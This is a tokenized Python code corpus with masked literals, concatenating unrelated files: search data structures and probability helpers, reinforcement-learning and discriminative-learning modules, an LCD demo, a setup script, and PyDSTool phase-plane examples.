<NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <EOL> <NUM_LIT> , <NUM_LIT> , <NUM_LIT> , <NUM_LIT> ) , None ) <EOL> self . random = random . Random ( ) <EOL> self . random . setstate ( fixedState ) <EOL> """<STR_LIT>""" <EOL> class Stack : <EOL> "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . list = [ ] <EOL> def push ( self , item ) : <EOL> "<STR_LIT>" <EOL> self . list . append ( item ) <EOL> def pop ( self ) : <EOL> "<STR_LIT>" <EOL> return self . list . pop ( ) <EOL> def isEmpty ( self ) : <EOL> "<STR_LIT>" <EOL> return len ( self . list ) == <NUM_LIT:0> <EOL> class Queue : <EOL> "<STR_LIT>" <EOL> def __init__ ( self ) : <EOL> self . list = [ ] <EOL> def push ( self , item ) : <EOL> "<STR_LIT>" <EOL> self . list . insert ( <NUM_LIT:0> , item ) <EOL> def pop ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . list . pop ( ) <EOL> def isEmpty ( self ) : <EOL> "<STR_LIT>" <EOL> return len ( self . list ) == <NUM_LIT:0> <EOL> class PriorityQueue : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self ) : <EOL> self . heap = [ ] <EOL> self . count = <NUM_LIT:0> <EOL> def push ( self , item , priority ) : <EOL> entry = ( priority , self . count , item ) <EOL> heapq . heappush ( self . heap , entry ) <EOL> self . count += <NUM_LIT:1> <EOL> def pop ( self ) : <EOL> ( _ , _ , item ) = heapq . heappop ( self . heap ) <EOL> return item <EOL> def isEmpty ( self ) : <EOL> return len ( self . heap ) == <NUM_LIT:0> <EOL> class PriorityQueueWithFunction ( PriorityQueue ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , priorityFunction ) : <EOL> "<STR_LIT>" <EOL> self . priorityFunction = priorityFunction <EOL> PriorityQueue . __init__ ( self ) <EOL> def push ( self , item ) : <EOL> "<STR_LIT>" <EOL> PriorityQueue . push ( self , item , self . priorityFunction ( item ) ) <EOL> def manhattanDistance ( xy1 , xy2 ) : <EOL> "<STR_LIT>" <EOL> return abs ( xy1 [ <NUM_LIT:0> ] - xy2 [ <NUM_LIT:0> ] ) + abs ( xy1 [ <NUM_LIT:1> ] - xy2 [ <NUM_LIT:1> ] ) <EOL> """<STR_LIT>""" <EOL> class Counter ( dict ) : <EOL> """<STR_LIT>""" <EOL> def __getitem__ ( self , idx ) : <EOL> self . setdefault ( idx , <NUM_LIT:0> ) <EOL> return dict . __getitem__ ( self , idx ) <EOL> def incrementAll ( self , keys , count ) : <EOL> """<STR_LIT>""" <EOL> for key in keys : <EOL> self [ key ] += count <EOL> def argMax ( self ) : <EOL> """<STR_LIT>""" <EOL> if len ( self . keys ( ) ) == <NUM_LIT:0> : <EOL> return None <EOL> all = self . items ( ) <EOL> values = [ x [ <NUM_LIT:1> ] for x in all ] <EOL> maxIndex = values . index ( max ( values ) ) <EOL> return all [ maxIndex ] [ <NUM_LIT:0> ] <EOL> def sortedKeys ( self ) : <EOL> """<STR_LIT>""" <EOL> sortedItems = self . items ( ) <EOL> compare = lambda x , y : sign ( y [ <NUM_LIT:1> ] - x [ <NUM_LIT:1> ] ) <EOL> sortedItems . sort ( cmp = compare ) <EOL> return [ x [ <NUM_LIT:0> ] for x in sortedItems ] <EOL> def totalCount ( self ) : <EOL> """<STR_LIT>""" <EOL> return sum ( self . values ( ) ) <EOL> def normalize ( self ) : <EOL> """<STR_LIT>""" <EOL> total = float ( self . totalCount ( ) ) <EOL> if total == <NUM_LIT:0> : <EOL> return <EOL> for key in self . keys ( ) : <EOL> self [ key ] = self [ key ] / total <EOL> def divideAll ( self , divisor ) : <EOL> """<STR_LIT>""" <EOL> divisor = float ( divisor ) <EOL> for key in self : <EOL> self [ key ] /= divisor <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return Counter ( dict . copy ( self ) ) <EOL> def __mul__ ( self , y ) : <EOL> """<STR_LIT>""" <EOL> sum = <NUM_LIT:0> <EOL> x = self <EOL> if len ( x ) > len ( y ) : <EOL> x , y = y , x <EOL> for key in x : <EOL> if key not in y : <EOL> continue <EOL> sum += x [ key ] * y [ key ] <EOL> return sum <EOL> def __radd__ ( self , y ) : <EOL> """<STR_LIT>""" <EOL> for key , value in y . items ( ) : <EOL> self [ key ] += value <EOL> def __add__ ( self , y ) : <EOL> """<STR_LIT>""" <EOL> addend = Counter ( ) <EOL> for key in self : <EOL> if key in y : <EOL> addend [ key ] = self [ key ] + y [ key ] <EOL> else : <EOL> addend [ key ] = self [ key ] <EOL> for key in y : <EOL> if key in self : <EOL> continue <EOL> addend [ key ] = y [ key ] <EOL> return addend <EOL> def __sub__ ( self , y ) : <EOL> """<STR_LIT>""" <EOL> addend = Counter ( ) <EOL> for key in self : <EOL> if key in y : <EOL> addend [ key ] = self [ key ] - y [ key ] <EOL> else : <EOL> addend [ key ] = self [ key ] <EOL> for key in y : <EOL> if key in self : <EOL> continue <EOL> addend [ key ] = - <NUM_LIT:1> * y [ key ] <EOL> return addend <EOL> def raiseNotDefined ( ) : <EOL> fileName = inspect . stack ( ) [ <NUM_LIT:1> ] [ <NUM_LIT:1> ] <EOL> line = inspect . stack ( ) [ <NUM_LIT:1> ] [ <NUM_LIT:2> ] <EOL> method = inspect . stack ( ) [ <NUM_LIT:1> ] [ <NUM_LIT:3> ] <EOL> print "<STR_LIT>" % ( method , line , fileName ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def normalize ( vectorOrCounter ) : <EOL> """<STR_LIT>""" <EOL> normalizedCounter = Counter ( ) <EOL> if isinstance ( vectorOrCounter , type ( normalizedCounter ) ) : <EOL> counter = vectorOrCounter <EOL> total = float ( counter . totalCount ( ) ) <EOL> if total == <NUM_LIT:0> : <EOL> return counter <EOL> for key in counter . keys ( ) : <EOL> value = counter [ key ] <EOL> normalizedCounter [ key ] = value / total <EOL> return normalizedCounter <EOL> else : <EOL> vector = vectorOrCounter <EOL> s = float ( sum ( vector ) ) <EOL> if s == <NUM_LIT:0> : <EOL> return vector <EOL> return [ el / s for el in vector ] <EOL> def nSample ( distribution , values , n ) : <EOL> if sum ( distribution ) != <NUM_LIT:1> : <EOL> distribution = normalize ( distribution ) <EOL> rand = sorted ( [ random . random ( ) for i in range ( n ) ] ) <EOL> samples = [ ] <EOL> samplePos , distPos , cdf = <NUM_LIT:0> , <NUM_LIT:0> , distribution [ <NUM_LIT:0> ] <EOL> while samplePos < n : <EOL> if rand [ samplePos ] < cdf : <EOL> samplePos += <NUM_LIT:1> <EOL> samples . append ( values [ distPos ] ) <EOL> else : <EOL> distPos += <NUM_LIT:1> <EOL> cdf += distribution [ distPos ] <EOL> return samples <EOL> def sample ( distribution , values = None ) : <EOL> if isinstance ( distribution , Counter ) : <EOL> items = distribution . items ( ) <EOL> distribution = [ i [ <NUM_LIT:1> ] for i in items ] <EOL> values = [ i [ <NUM_LIT:0> ] for i in items ] <EOL> if sum ( distribution ) != <NUM_LIT:1> : <EOL> distribution = normalize ( distribution ) <EOL> choice = random . random ( ) <EOL> i , total = <NUM_LIT:0> , distribution [ <NUM_LIT:0> ] <EOL> while choice > total : <EOL> i += <NUM_LIT:1> <EOL> total += distribution [ i ] <EOL> return values [ i ] <EOL> def sampleFromCounter ( ctr ) : <EOL> items = ctr . items ( ) <EOL> return sample ( [ v for k , v in items ] , [ k for k , v in items ] ) <EOL> def getProbability ( value , distribution , values ) : <EOL> """<STR_LIT>""" <EOL> total = <NUM_LIT:0.0> <EOL> for prob , val in zip ( distribution , values ) : <EOL> if val == value : <EOL> total += prob <EOL> return total <EOL> def flipCoin ( p ) : <EOL> r = random . random ( ) <EOL> return r < p <EOL> def chooseFromDistribution ( distribution ) : <EOL> "<STR_LIT>" <EOL> if isinstance ( distribution , dict ) or isinstance ( distribution , Counter ) : <EOL> return sample ( distribution ) <EOL> r = random . random ( ) <EOL> base = <NUM_LIT:0.0> <EOL> for prob , element in distribution : <EOL> base += prob <EOL> if r <= base : <EOL> return element <EOL> def nearestPoint ( pos ) : <EOL> """<STR_LIT>""" <EOL> ( current_row , current_col ) = pos <EOL> grid_row = int ( current_row + <NUM_LIT:0.5> ) <EOL> grid_col = int ( current_col + <NUM_LIT:0.5> ) <EOL> return ( grid_row , grid_col ) <EOL> def sign ( x ) : <EOL> """<STR_LIT>""" <EOL> if ( x >= <NUM_LIT:0> ) : <EOL> return <NUM_LIT:1> <EOL> else : <EOL> return - <NUM_LIT:1> <EOL> def arrayInvert ( array ) : <EOL> """<STR_LIT>""" <EOL> result = [ [ ] for i in array ] <EOL> for outer in array : <EOL> for inner in range ( len ( outer ) ) : <EOL> result [ inner ] . append ( outer [ inner ] ) <EOL> return result <EOL> def matrixAsList ( matrix , value = True ) : <EOL> """<STR_LIT>""" <EOL> rows , cols = len ( matrix ) , len ( matrix [ <NUM_LIT:0> ] ) <EOL> cells = [ ] <EOL> for row in range ( rows ) : <EOL> for col in range ( cols ) : <EOL> if matrix [ row ] [ col ] == value : <EOL> cells . append ( ( row , col ) ) <EOL> return cells <EOL> def lookup ( name , namespace ) : <EOL> """<STR_LIT>""" <EOL> dots = name . count ( '<STR_LIT:.>' ) <EOL> if dots > <NUM_LIT:0> : <EOL> moduleName , objName = '<STR_LIT:.>' . join ( <EOL> name . split ( '<STR_LIT:.>' ) [ : - <NUM_LIT:1> ] ) , name . split ( '<STR_LIT:.>' ) [ - <NUM_LIT:1> ] <EOL> module = __import__ ( moduleName ) <EOL> return getattr ( module , objName ) <EOL> else : <EOL> modules = [ obj for obj in namespace . values ( ) if str ( <EOL> type ( obj ) ) == "<STR_LIT>" ] <EOL> options = [ getattr ( module , name ) <EOL> for module in modules if name in dir ( module ) ] <EOL> options += [ obj [ <NUM_LIT:1> ] for obj in namespace . items ( ) if obj [ <NUM_LIT:0> ] == name ] <EOL> if len ( options ) == <NUM_LIT:1> : <EOL> return options [ <NUM_LIT:0> ] <EOL> if len ( options ) > <NUM_LIT:1> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> raise Exception ( '<STR_LIT>' % name ) <EOL> def pause ( ) : <EOL> """<STR_LIT>""" <EOL> print "<STR_LIT>" <EOL> raw_input ( ) <EOL> import signal <EOL> import time <EOL> class TimeoutFunctionException ( Exception ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> class TimeoutFunction : <EOL> def __init__ ( self , function , timeout ) : <EOL> self . timeout = timeout <EOL> self . function = function <EOL> def handle_timeout ( self , signum , frame ) : <EOL> raise TimeoutFunctionException ( ) <EOL> def __call__ ( self , * args , ** keyArgs ) : <EOL> if hasattr ( signal , '<STR_LIT>' ) : <EOL> old = signal . signal ( signal . SIGALRM , self . handle_timeout ) <EOL> signal . alarm ( self . timeout ) <EOL> try : <EOL> result = self . function ( * args , ** keyArgs ) <EOL> finally : <EOL> signal . signal ( signal . SIGALRM , old ) <EOL> signal . alarm ( <NUM_LIT:0> ) <EOL> else : <EOL> startTime = time . time ( ) <EOL> result = self . function ( * args , ** keyArgs ) <EOL> timeElapsed = time . time ( ) - startTime <EOL> if timeElapsed >= self . timeout : <EOL> self . handle_timeout ( None , None ) <EOL> return result <EOL> _ORIGINAL_STDOUT = None <EOL> _ORIGINAL_STDERR = None <EOL> _MUTED = False <EOL> class WritableNull : <EOL> def write ( self , string ) : <EOL> pass <EOL> def mutePrint ( ) : <EOL> global _ORIGINAL_STDOUT , _ORIGINAL_STDERR , _MUTED <EOL> if _MUTED : <EOL> return <EOL> _MUTED = True <EOL> _ORIGINAL_STDOUT = sys . stdout <EOL> sys . stdout = WritableNull ( ) <EOL> def unmutePrint ( ) : <EOL> global _ORIGINAL_STDOUT , _ORIGINAL_STDERR , _MUTED <EOL> if not _MUTED : <EOL> return <EOL> _MUTED = False <EOL> sys . stdout = _ORIGINAL_STDOUT </s>
<s> """<STR_LIT>""" <EOL> from . Representation import Representation <EOL> import numpy as np <EOL> __copyright__ = "<STR_LIT>" <EOL> __credits__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> __license__ = "<STR_LIT>" <EOL> __author__ = "<STR_LIT>" <EOL> class IndependentDiscretization ( Representation ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , domain , discretization = <NUM_LIT:20> ) : <EOL> self . setBinsPerDimension ( domain , discretization ) <EOL> self . features_num = int ( sum ( self . bins_per_dim ) ) <EOL> self . maxFeatureIDperDimension = np . cumsum ( self . bins_per_dim ) - <NUM_LIT:1> <EOL> super ( <EOL> IndependentDiscretization , <EOL> self ) . __init__ ( <EOL> domain , <EOL> discretization ) <EOL> def phi_nonTerminal ( self , s ) : <EOL> F_s = np . zeros ( <EOL> self . features_num , <EOL> '<STR_LIT:bool>' ) <EOL> F_s [ self . activeInitialFeatures ( s ) ] = <NUM_LIT:1> <EOL> return F_s <EOL> def getDimNumber ( self , f ) : <EOL> dim = np . searchsorted ( self . maxFeatureIDperDimension , f ) <EOL> return dim <EOL> def getFeatureName ( self , feat_id ) : <EOL> if hasattr ( self . domain , '<STR_LIT>' ) : <EOL> dim = np . searchsorted ( self . maxFeatureIDperDimension , feat_id ) <EOL> index_in_dim = feat_id <EOL> if dim != <NUM_LIT:0> : <EOL> index_in_dim = feat_id - self . maxFeatureIDperDimension [ dim - <NUM_LIT:1> ] <EOL> print self . domain . DimNames [ dim ] <EOL> f_name = self . domain . DimNames [ dim ] + '<STR_LIT:=>' + str ( index_in_dim ) <EOL> def featureType ( self ) : <EOL> return bool </s>
<s> """<STR_LIT>""" <EOL> import numpy as np <EOL> from nose . tools import ok_ , eq_ <EOL> import glob <EOL> import logging <EOL> from rlpy . Tools . run import read_setting_content <EOL> __copyright__ = "<STR_LIT>" <EOL> __credits__ = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> __license__ = "<STR_LIT>" <EOL> def test_all_100_step ( ) : <EOL> for fn in glob . glob ( "<STR_LIT>" ) : <EOL> if fn in glob . glob ( "<STR_LIT>" ) : <EOL> continue ; <EOL> if "<STR_LIT>" in fn or "<STR_LIT>" in fn : <EOL> continue <EOL> yield check_running , fn , <NUM_LIT:100> <EOL> def check_running ( filename , steps ) : <EOL> content = read_setting_content ( filename ) <EOL> local = { } <EOL> exec content in local <EOL> make_experiment = local [ "<STR_LIT>" ] <EOL> exp = make_experiment ( exp_id = <NUM_LIT:1> , path = "<STR_LIT>" ) <EOL> exp . max_steps = steps <EOL> exp . config_logging = False <EOL> exp . num_policy_checks = <NUM_LIT:2> <EOL> exp . checks_per_policy = <NUM_LIT:1> <EOL> exp . run ( ) <EOL> def test_tutorial ( ) : <EOL> content = read_setting_content ( "<STR_LIT>" ) <EOL> local = { } <EOL> exec content in local <EOL> make_experiment = local [ "<STR_LIT>" ] <EOL> exp = make_experiment ( exp_id = <NUM_LIT:1> , path = "<STR_LIT>" ) <EOL> exp . config_logging = False <EOL> exp . run ( ) <EOL> print "<STR_LIT>" , exp . result [ "<STR_LIT>" ] [ - <NUM_LIT:1> ] <EOL> assert exp . result [ "<STR_LIT>" ] [ - <NUM_LIT:1> ] > <NUM_LIT> </s>
<s> import pcd8544 . lcd as lcd <EOL> def demo ( ) : <EOL> lcd . locate ( <NUM_LIT:0> , <NUM_LIT:0> ) <EOL> lcd . text ( map ( chr , range ( <NUM_LIT> , <NUM_LIT> ) ) ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> lcd . init ( ) <EOL> lcd . backlight ( <NUM_LIT:1> ) <EOL> demo ( ) </s>
<s> import pandas as pd <EOL> import numpy as np <EOL> from sklearn . feature_extraction import DictVectorizer <EOL> import alias <EOL> def explode ( cues ) : <EOL> if isinstance ( cues , basestring ) : <EOL> cues = cues . split ( '<STR_LIT:_>' ) <EOL> return { } . fromkeys ( cues , True ) <EOL> def orthoCoding ( strs , grams = <NUM_LIT:2> , sep = None ) : <EOL> if not np . iterable ( grams ) : <EOL> grams = [ grams ] <EOL> result = [ ] <EOL> for str in strs : <EOL> cues = [ ] <EOL> str = list ( str ) <EOL> for n in grams : <EOL> if n > <NUM_LIT:1> : <EOL> seq = [ '<STR_LIT:#>' ] + str + [ '<STR_LIT:#>' ] <EOL> else : <EOL> seq = str <EOL> count = max ( <NUM_LIT:0> , len ( seq ) - n + <NUM_LIT:1> ) <EOL> cues . extend ( '<STR_LIT>' . join ( seq [ i : i + n ] ) for i in xrange ( count ) ) <EOL> if sep : <EOL> result . append ( sep . join ( cues ) ) <EOL> else : <EOL> result . append ( tuple ( cues ) ) <EOL> return result <EOL> def danks ( data ) : <EOL> feats = DictVectorizer ( dtype = int , sparse = False ) <EOL> marginals = data . groupby ( '<STR_LIT>' , as_index = False ) . Frequency . sum ( ) <EOL> marginals = marginals . rename ( columns = { '<STR_LIT>' : '<STR_LIT>' } ) <EOL> data = pd . merge ( data , marginals , on = '<STR_LIT>' ) <EOL> result = pd . DataFrame ( ) <EOL> for outcome in data . Outcomes . unique ( ) : <EOL> yes = data [ data . Outcomes == outcome ] <EOL> M = feats . fit_transform ( [ explode ( c ) for c in yes . Cues ] ) <EOL> P = np . diag ( yes . Total / sum ( yes . Total ) ) <EOL> MTP = M . T . dot ( P ) <EOL> O = yes . Frequency / yes . Total <EOL> left = MTP . dot ( M ) <EOL> right = MTP . dot ( O ) <EOL> V = np . linalg . solve ( left , right ) <EOL> result [ outcome ] = V <EOL> result . index = feats . get_feature_names ( ) <EOL> return result <EOL> def ndl ( data ) : <EOL> vec = DictVectorizer ( dtype = float , sparse = False ) <EOL> D = vec . fit_transform ( [ explode ( c ) for c in data . Cues ] ) * data . Frequency [ : , np . newaxis ] <EOL> n = len ( vec . get_feature_names ( ) ) <EOL> C = np . zeros ( ( n , n ) ) <EOL> for row in D : <EOL> for nz in np . nonzero ( row ) : <EOL> C [ nz ] += row <EOL> Z = C . sum ( axis = <NUM_LIT:1> ) <EOL> C1 = C / Z [ : , np . newaxis ] <EOL> out = DictVectorizer ( dtype = float , sparse = False ) <EOL> X = out . fit_transform ( [ explode ( c ) for c in data . Outcomes ] ) * data . Frequency [ : , np . newaxis ] <EOL> O = np . zeros ( ( len ( vec . get_feature_names ( ) ) , len ( out . get_feature_names ( ) ) ) ) <EOL> for i in xrange ( len ( X ) ) : <EOL> for nz in np . nonzero ( D [ i ] ) : <EOL> O [ nz ] += X [ i ] <EOL> O1 = O / Z [ : , np . newaxis ] <EOL> W = np . linalg . pinv ( C1 ) . dot ( O1 ) <EOL> return pd . DataFrame ( W , columns = out . get_feature_names ( ) , index = vec . get_feature_names ( ) ) <EOL> def activation ( cues , W ) : <EOL> A = np . zeros ( len ( W . columns ) ) <EOL> if isinstance ( cues , basestring ) : <EOL> cues = cues . split ( '<STR_LIT:_>' ) <EOL> for cue in cues : <EOL> A += W . loc [ cue ] <EOL> return pd . Series ( A , index = W . columns ) <EOL> def activation ( cues , W ) : <EOL> if isinstance ( cues , basestring ) : <EOL> cues = cues . split ( '<STR_LIT:_>' ) <EOL> return W [ [ ( c in cues ) for c in W . index ] ] . sum ( ) <EOL> def _rwUpdate ( W , D , O , Alpha , Beta , Lambda ) : <EOL> Vtotal = np . dot ( W . T , D ) <EOL> L = O * Lambda <EOL> Vdelta = Alpha * Beta * ( L - Vtotal ) <EOL> W += D [ : , np . newaxis ] * Vdelta <EOL> try : <EOL> import _ndl <EOL> rwUpdate = _ndl . rwUpdate <EOL> except ImportError : <EOL> rwUpdate = _rwUpdate <EOL> def rw ( data , Alpha = <NUM_LIT:0.1> , Beta = <NUM_LIT:0.1> , Lambda = <NUM_LIT:1.0> , M = <NUM_LIT> , distribution = None , trajectory = False ) : <EOL> cues = DictVectorizer ( dtype = np . int , sparse = False ) <EOL> D = cues . fit_transform ( [ explode ( c ) for c in data . Cues ] ) <EOL> out = DictVectorizer ( dtype = np . int , sparse = False ) <EOL> O = out . fit_transform ( [ explode ( c ) for c in data . Outcomes ] ) <EOL> W = np . zeros ( ( len ( cues . get_feature_names ( ) ) , len ( out . get_feature_names ( ) ) ) ) <EOL> if distribution is None : <EOL> E = data . Frequency / sum ( data . Frequency ) <EOL> rand = alias . multinomial ( E ) <EOL> history = dict ( ) <EOL> i = <NUM_LIT:0> <EOL> while i < M : <EOL> i += <NUM_LIT:1> <EOL> if distribution is None : <EOL> item = rand . draw ( ) <EOL> else : <EOL> item = distribution ( ) - <NUM_LIT:1> <EOL> while item >= len ( data ) : <EOL> item = distribution ( ) - <NUM_LIT:1> <EOL> rwUpdate ( W , D [ item , : ] , O [ item , : ] , Alpha , Beta , Lambda ) <EOL> if trajectory : <EOL> history [ i ] = pd . DataFrame ( W , columns = out . get_feature_names ( ) , index = cues . get_feature_names ( ) , copy = True ) <EOL> if trajectory : <EOL> return pd . Panel . from_dict ( history ) <EOL> else : <EOL> return pd . DataFrame ( W , columns = out . get_feature_names ( ) , index = cues . get_feature_names ( ) ) </s>
<s> import codecs <EOL> try : <EOL> from setuptools import setup , find_packages <EOL> except ImportError : <EOL> from ez_setup import use_setuptools <EOL> use_setuptools ( ) <EOL> from setuptools import setup , find_packages <EOL> import media_bundler <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> version = media_bundler . __version__ , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> description = "<STR_LIT>" <EOL> + "<STR_LIT>" , <EOL> packages = find_packages ( ) , <EOL> zip_safe = False , <EOL> url = '<STR_LIT>' , <EOL> classifiers = [ <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> ] , <EOL> long_description = "<STR_LIT>" , <EOL> ) </s>
<s> from __future__ import division <EOL> from WC_net import * <EOL> from PyDSTool . Toolbox . phaseplane import * <EOL> builder = rate_network ( ) <EOL> S = thresh_Naka_Rushton_fndef ( <NUM_LIT:2> , <NUM_LIT> , <NUM_LIT:100> , with_if = False ) <EOL> builder . add_neuron ( '<STR_LIT>' , tau = <NUM_LIT:20> , ic = <NUM_LIT:15> , thresh_fn = S ) <EOL> builder . add_neuron ( '<STR_LIT>' , tau = <NUM_LIT:20> , ic = <NUM_LIT> , thresh_fn = S ) <EOL> builder . add_syn_input_to_neuron ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:3> ) <EOL> builder . add_syn_input_to_neuron ( '<STR_LIT>' , '<STR_LIT>' , <NUM_LIT:3> ) <EOL> net = builder . make_network ( ) <EOL> net . set ( tdata = [ <NUM_LIT:0> , <NUM_LIT> ] , <EOL> algparams = { '<STR_LIT>' : <NUM_LIT:0.5> } ) <EOL> traj = net . compute ( '<STR_LIT:test>' ) <EOL> pts = traj . sample ( ) <EOL> plt . plot ( pts [ '<STR_LIT:t>' ] , pts [ '<STR_LIT>' ] , '<STR_LIT:g>' ) <EOL> plt . plot ( pts [ '<STR_LIT:t>' ] , pts [ '<STR_LIT>' ] , '<STR_LIT:r>' ) <EOL> jac_fn = make_Jac ( net ) <EOL> fps = find_fixedpoints ( net , { '<STR_LIT>' : [ <NUM_LIT:0> , <NUM_LIT:200> ] , '<STR_LIT>' : [ <NUM_LIT:0> , <NUM_LIT:200> ] } , <EOL> jac = jac_fn , n = <NUM_LIT:6> ) <EOL> nullc_E1 , nullc_E2 = find_nullclines ( net , '<STR_LIT>' , '<STR_LIT>' , <EOL> { '<STR_LIT>' : [ <NUM_LIT:0> , <NUM_LIT:100> ] , '<STR_LIT>' : [ <NUM_LIT:0> , <NUM_LIT:100> ] } , <EOL> max_step = <NUM_LIT:1> , crop_tol_pc = <NUM_LIT:0> , <EOL> fps = fps , n = <NUM_LIT:3> , <EOL> jac = jac_fn ) <EOL> fp1 = fixedpoint_2D ( net , Point ( fps [ <NUM_LIT:0> ] ) , coords = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> eps = <NUM_LIT> , jac = jac_fn ) <EOL> plt . figure ( <NUM_LIT:2> ) <EOL> plt . plot ( nullc_E1 [ : , <NUM_LIT:0> ] , nullc_E1 [ : , <NUM_LIT:1> ] , label = '<STR_LIT>' ) <EOL> plt . plot ( nullc_E2 [ : , <NUM_LIT:0> ] , nullc_E2 [ : , <NUM_LIT:1> ] , label = '<STR_LIT>' ) <EOL> plt . plot ( pts [ '<STR_LIT>' ] , pts [ '<STR_LIT>' ] , '<STR_LIT:k>' ) <EOL> plt . plot ( pts [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , pts [ '<STR_LIT>' ] [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> plt . plot ( pts [ '<STR_LIT>' ] [ - <NUM_LIT:1> ] , pts [ '<STR_LIT>' ] [ - <NUM_LIT:1> ] , '<STR_LIT>' ) <EOL> plt . legend ( loc = '<STR_LIT>' ) <EOL> plt . show ( ) </s>
<s> import PyDSTool as dst <EOL> from PyDSTool import args <EOL> import numpy as np <EOL> from matplotlib import pyplot as plt <EOL> pars = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT:a>' : <NUM_LIT:0.5> } <EOL> icdict = { '<STR_LIT:x>' : pars [ '<STR_LIT:a>' ] , <EOL> '<STR_LIT:y>' : pars [ '<STR_LIT:a>' ] - pars [ '<STR_LIT:a>' ] ** <NUM_LIT:3> / <NUM_LIT:3> } <EOL> xstr = '<STR_LIT>' <EOL> ystr = '<STR_LIT>' <EOL> event_x_a = dst . makeZeroCrossEvent ( '<STR_LIT>' , <NUM_LIT:0> , <EOL> { '<STR_LIT:name>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : <NUM_LIT> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : True } , <EOL> varnames = [ '<STR_LIT:x>' ] , parnames = [ '<STR_LIT:a>' ] , <EOL> targetlang = '<STR_LIT>' ) <EOL> DSargs = args ( name = '<STR_LIT>' ) <EOL> DSargs . events = [ event_x_a ] <EOL> DSargs . pars = pars <EOL> DSargs . tdata = [ <NUM_LIT:0> , <NUM_LIT:3> ] <EOL> DSargs . algparams = { '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : <NUM_LIT> , '<STR_LIT>' : True } <EOL> DSargs . varspecs = { '<STR_LIT:x>' : xstr , '<STR_LIT:y>' : ystr } <EOL> DSargs . xdomain = { '<STR_LIT:x>' : [ - <NUM_LIT> , <NUM_LIT> ] , '<STR_LIT:y>' : [ - <NUM_LIT:2> , <NUM_LIT:2> ] } <EOL> DSargs . fnspecs = { '<STR_LIT>' : ( [ '<STR_LIT:t>' , '<STR_LIT:x>' , '<STR_LIT:y>' ] , <EOL> """<STR_LIT>""" ) } <EOL> DSargs . ics = icdict <EOL> vdp = dst . Vode_ODEsystem ( DSargs ) <EOL> traj = vdp . compute ( '<STR_LIT>' ) <EOL> pts = traj . sample ( ) <EOL> evs = traj . getEvents ( '<STR_LIT>' ) <EOL> plt . figure ( <NUM_LIT:1> ) <EOL> plt . plot ( pts [ '<STR_LIT:t>' ] , pts [ '<STR_LIT:x>' ] , '<STR_LIT:b>' , linewidth = <NUM_LIT:2> ) <EOL> plt . plot ( pts [ '<STR_LIT:t>' ] , pts [ '<STR_LIT:y>' ] , '<STR_LIT:r>' , linewidth = <NUM_LIT:2> ) <EOL> plt . figure ( <NUM_LIT:2> ) <EOL> from PyDSTool . Toolbox import phaseplane as pp <EOL> pp . plot_PP_vf ( vdp , '<STR_LIT:x>' , '<STR_LIT:y>' , scale_exp = - <NUM_LIT:1> ) <EOL> fp_coord = pp . find_fixedpoints ( vdp , n = <NUM_LIT:4> , eps = <NUM_LIT> ) [ <NUM_LIT:0> ] <EOL> fp = pp . fixedpoint_2D ( vdp , dst . Point ( fp_coord ) , eps = <NUM_LIT> ) <EOL> nulls_x , nulls_y = pp . find_nullclines ( vdp , '<STR_LIT:x>' , '<STR_LIT:y>' , n = <NUM_LIT:3> , eps = <NUM_LIT> , <EOL> max_step = <NUM_LIT:0.1> , fps = [ fp_coord ] ) <EOL> pp . plot_PP_fps ( fp ) <EOL> plt . plot ( nulls_x [ : , <NUM_LIT:0> ] , nulls_x [ : , <NUM_LIT:1> ] , '<STR_LIT:b>' ) <EOL> plt . plot ( nulls_y [ : , <NUM_LIT:0> ] , nulls_y [ : , <NUM_LIT:1> ] , '<STR_LIT:g>' ) <EOL> plt . plot ( pts [ '<STR_LIT:x>' ] , pts [ '<STR_LIT:y>' ] , '<STR_LIT>' , linewidth = <NUM_LIT:2> ) <EOL> plt . plot ( evs [ '<STR_LIT:x>' ] , evs [ '<STR_LIT:y>' ] , '<STR_LIT>' ) <EOL> plt . axis ( '<STR_LIT>' ) <EOL> plt . title ( 